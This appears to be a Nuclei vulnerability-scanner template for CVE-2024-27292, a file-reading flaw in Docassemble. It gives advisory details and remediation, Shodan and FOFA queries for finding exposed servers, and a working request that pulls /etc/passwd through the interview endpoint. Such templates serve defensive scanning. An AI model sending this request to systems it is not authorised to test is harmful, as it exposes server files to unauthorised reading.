id: CVE-2024-27292 info: name: Docassemble - Local File Inclusion author: johnk3r severity: high description: | Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. impact: | Unauthenticated attackers can read arbitrary files on the server through URL manipulation in the Docassemble interview endpoint. remediation: | Update Docassemble to version 1.4.97 or later. reference: - https://tantosec.com/blog/docassemble/ - https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv - https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-27292 cwe-id: CWE-706 epss-score: 0.93825 epss-percentile: 0.99872 metadata: verified: true max-request: 1 shodan-query: http.title:"docassemble" fofa-query: icon_hash="-575790689" tags: cve,cve2024,docassemble,lfi,vkev,vuln http: - method: GET path: - "{{BaseURL}}/interview?i=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 501 # digest: 4a0a004730450221009e1e4df11593c6337bd8de30751a1f4ade4df6c7879ccf2f48cfb69bbeda0b4e02207ab8949a3ae3259d9d68f83a70e554b02162800e76a86c6daa93fca06cdc9a93:922c64590222798bb761d5b6d8e72950